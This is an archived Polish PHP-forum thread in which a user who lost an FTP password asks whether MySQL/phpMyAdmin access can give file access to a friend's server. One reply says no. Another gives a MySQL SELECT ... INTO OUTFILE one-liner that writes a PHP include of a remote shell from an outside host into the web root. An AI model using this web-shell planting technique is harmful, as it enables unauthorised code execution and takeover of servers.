Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [PHP][MYSQL]z bazy danych na serwer
Forum PHP.pl > Forum > Przedszkole
Chemiq
temat może nie mówi zbyt dużo więc wyjaśniam o co mi chodzi. byłem zmuszony sformatować ostatnio jedną z partycji na której miałem TotalCommandera ze wszystkimi hasłami do ftp. ze względu bezpieczeństwa nie zapisuję sobie nigdzie na kartkach tych haseł.
prawie wszystkie udało mi się przypomnieć oprócz jednego. pamiętam jednak hasło do phpmyadmina z bazą danych do serwisu który znajduje się na ftp. serwer jest prywatny i należy do jednego z moich znajomych. poprosiłem go o zmianę hasła lecz niestety będzie mógł to zrobić dopiero jak wróci z wakacji (+- 2 tygodnie) a ja chciałbym mieć dostęp do tego trochę szybciej.
i tu moje pytanie: czy da się jakoś dostać na ftp przez bazę mysql? jeżeli tak to jak? oczywiście znam wszystkie pliki które się tam znajdują oraz ich zawartość (jeżeli to ma jakieś znaczenie) bo mam ich kopie na swoim dysku.

proszę o pomoc
z góry dziękuję biggrin.gif
wookieb
Nie da sie.
Chemiq
może to głupie że się nadal upieram ale czy nie da się tego zrobić nawet zahaczając o hacking?

jeżeli się nie da no to trudno. jakoś przeżyję te 2 tygodnie tongue.gif
wookieb
Nie da sie
1) mysql nie ma takich mozliwosci (jezeli ma to trzeba by naprawde poszuakc)
2) nawet gdyby mial to i tak musialbys znac hasła do ftp.
pyro
w pewnym sensie mozna, aczkolwiek nie rozumiem do jakiego ftp... zakładam, że chodzi o serwer, na ktorym jest tez MySQL

przez mysql
  1. SELECT '<?php include("http://www.jakishost.pl/shell.txt"); ?>' INTO OUTFILE 'sciezka/do/twojej/strony';

shelle są bardzo pomocne przy zarządzaniu plikami na serwerze
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.